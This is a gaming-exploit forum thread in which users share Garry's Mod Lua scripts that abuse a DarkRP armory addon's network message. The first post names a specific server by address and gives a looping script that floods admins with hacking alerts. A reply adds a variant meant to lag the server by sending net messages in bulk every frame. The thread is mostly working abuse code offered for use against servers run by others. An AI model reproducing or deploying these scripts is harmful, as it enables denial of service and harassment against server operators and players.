Results 1 to 6 of 6
  1. #1
    XxskaterxX100's Avatar
    Join Date
    Jan 2014
    Gender
    male
    Posts
    12
    Reputation
    10
    Thanks
    1

    DARKRP SERVER EXPLOIT [Armory Spam]

    So I was bored on this shitty server and found that everytime you "Try" to exploit this Armory Robbery Addon It Sends the whole server a message saying that you are hacking so what i did was make this code that spams it and it really annoys the admins have fun

    SERVER NAME: TTT-FUN DarkRP| 45+ Jobs| Pokemon| Mining
    ADDRESS: 206.221.182.118:27015 (connect 206.221.182.118:27015)

    Code:
    function hit()
    timer.Create( "msgspam", 0.1, 0, hit )
    	net.Start("ARMORY_RetrieveWeapon")
    			net.WriteString("weapon3")
    		net.SendToServer()
    end
    concommand.Add("hakme", hit)

    Enjoy


    [EDIT]

    This should work for all servers running this addon
    Last edited by XxskaterxX100; 12-11-2015 at 10:44 PM.

  2. #2
    D3M0L1T10N's Avatar
    Join Date
    May 2012
    Gender
    male
    Posts
    1,364
    Reputation
    19
    Thanks
    656
    ratchet code but nice idea
    8:53 PM - Xenomorphic 1 hr 7 min cooldown: So is MPGH only exist so people can c+p from ************* and troll the gmod section?

    [IMG]https://i739.photobucke*****m/albums/xx38/jorroa5990/flatexch2_zpsec96a7e2.gif[/IMG]

  3. #3
    Hunter's Avatar
    Join Date
    Dec 2013
    Gender
    male
    Location
    Depths Of My Mind.
    Posts
    17,468
    Reputation
    3771
    Thanks
    6,159
    My Mood
    Cheerful
    /Moved to the correct section.

  4. #4
    Keepo123's Avatar
    Join Date
    Oct 2015
    Gender
    male
    Location
    m͏̺͓̲̥̪is̷t̞̖͍͚̤k̥B̸̼&#81
    Posts
    84
    Reputation
    10
    Thanks
    163
    My Mood
    Yeehaw
    Quote Originally Posted by XxskaterxX100 View Post
    So I was bored on this shitty server and found that everytime you "Try" to exploit this Armory Robbery Addon It Sends the whole server a message saying that you are hacking so what i did was make this code that spams it and it really annoys the admins have fun

    SERVER NAME: TTT-FUN DarkRP| 45+ Jobs| Pokemon| Mining
    ADDRESS: 206.221.182.118:27015 (connect 206.221.182.118:27015)

    Code:
    function hit()
    timer.Create( "msgspam", 0.1, 0, hit )
    	net.Start("ARMORY_RetrieveWeapon")
    			net.WriteString("weapon3")
    		net.SendToServer()
    end
    concommand.Add("hakme", hit)

    Enjoy


    [EDIT]

    This should work for all servers running this addon
    Haven't test it but you could maybe lag out the server using this;

    Code:
    function Lag()
    	for i = 0, 1300 do
    		net.Start("ARMORY_RetrieveWeapon")
    		net.WriteString("weapon3")
    		net.SendToServer()
    	end
    end
    hook.Add("Think", "", Lag)

  5. The Following User Says Thank You to Keepo123 For This Useful Post:

    buckballs (02-08-2016)

  6. #5
    XxskaterxX100's Avatar
    Join Date
    Jan 2014
    Gender
    male
    Posts
    12
    Reputation
    10
    Thanks
    1
    Quote Originally Posted by Keepo123 View Post
    Haven't test it but you could maybe lag out the server using this;

    Code:
    function Lag()
    	for i = 0, 1300 do
    		net.Start("ARMORY_RetrieveWeapon")
    		net.WriteString("weapon3")
    		net.SendToServer()
    	end
    end
    hook.Add("Think", "", Lag)


    Thats a good idea ill try it out!

  7. #6
    KaCek13's Avatar
    Join Date
    Mar 2014
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0
    How do I use them?

Similar Threads

  1. [Outdated] DarkRP server with money exploit
    By TopKekSwag in forum Garry's Mod Server Exploits & Help
    Replies: 18
    Last Post: 03-09-2016, 05:39 PM
  2. [Solved] Any Exploitable DarkRP Servers?
    By XxskaterxX100 in forum Garry's Mod Server Exploits & Help
    Replies: 1
    Last Post: 02-21-2016, 11:00 AM
  3. DarkRP/TTT exploits
    By Cr0NiX in forum Garry's Mod Discussions & Help
    Replies: 10
    Last Post: 04-11-2013, 11:14 PM
  4. Crashing Servers With /mail Spam!
    By dennis96411 in forum Minecraft Tutorials
    Replies: 6
    Last Post: 11-10-2012, 03:07 AM
  5. Garry's Mod 11 DarkRP RCON Exploit
    By Agent766 in forum Exploits
    Replies: 3
    Last Post: 10-10-2008, 01:11 AM